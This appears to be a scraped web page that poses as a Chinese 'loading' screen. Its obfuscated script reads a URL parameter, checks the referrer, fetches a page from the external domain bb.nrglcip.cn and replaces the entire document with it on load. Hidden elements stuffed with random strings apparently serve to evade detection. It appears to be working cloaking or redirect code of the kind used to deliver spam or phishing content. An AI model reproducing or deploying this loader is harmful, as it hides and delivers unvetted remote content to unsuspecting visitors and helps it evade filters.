<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .WpAvdSUJs {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .WpAvdSUJs .WttyVVW {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .WpAvdSUJs .content {
            line-height: 50px;
            text-align: center
        }

        .WpAvdSUJs .img {
            width: 100%
        }

        .WpAvdSUJs .N2CmZ8oyz4Q {
            text-align: center
        }

        .WpAvdSUJs .N2CmZ8oyz4Q span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .WpAvdSUJs .N2CmZ8oyz4Q span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .WpAvdSUJs .N2CmZ8oyz4Q span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .WpAvdSUJs .N2CmZ8oyz4Q span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .WpAvdSUJs .N2CmZ8oyz4Q span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .WpAvdSUJs .N2CmZ8oyz4Q span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .WpAvdSUJs .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function JU0W9JFxPU(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var TG2uLOA = JU0W9JFxPU('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ TG2uLOA +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ TG2uLOA +".html?a=share";
		}
		
        WTEyZfk=url+"#"+new Date().getTime();
        WTEyZfk && function() {
            $.get(WTEyZfk, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>P6d8mpeqxpIn9gN7Go2l3KcWxzKmy5WzmZY1Padx3jdAuBo</p>
<span style='display:none'>djXBCyQaZZr1xKiDUG61F7FLYKS76QiqIXgdkuS3</span>
<li style='display:none' >nty6CBXJ6rQSDzpKyeq5fJobTNRtH2CbC5eXGup07272xEHcVDBVUUp</li>
<ul style='display:none' >mnEcDllwPSCH0QNekYKyUGuFjPFZyGkxyPDx4OVvVxqgxNUYlhqsAPgqQM4BDe5pyqA993x2U1wiQ</ul><div class="WpAvdSUJs">
    <div class="WttyVVW">
        <div class="N2CmZ8oyz4Q">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>adhkOhQakW68LRtJiKmjqsIytiGKr2aX8ssU100ZgpEc62F8t9gQxM7I7QXuNnOfzmW49bIDpGU9qxdmlFsBQrk</a>
<b style='display:none' >Ca2UENP3yR6o</b>
<h1 style='display:none' >shikJxNunnWj34UNcW7GRWyEylARMx3yyfrNTvA5NGWEwfGbKMJi7lsfO7vDPmJ</h1>
<img  src='' style='display:none'>
<div style='display:none'>uecqID6YQtowigv2JAwO5HuHfkzvXtsScLBsHw373tSd9fIXynMOI4QE3NXGRlh9kAYZhSk2iB7KXg</div></body>
</html>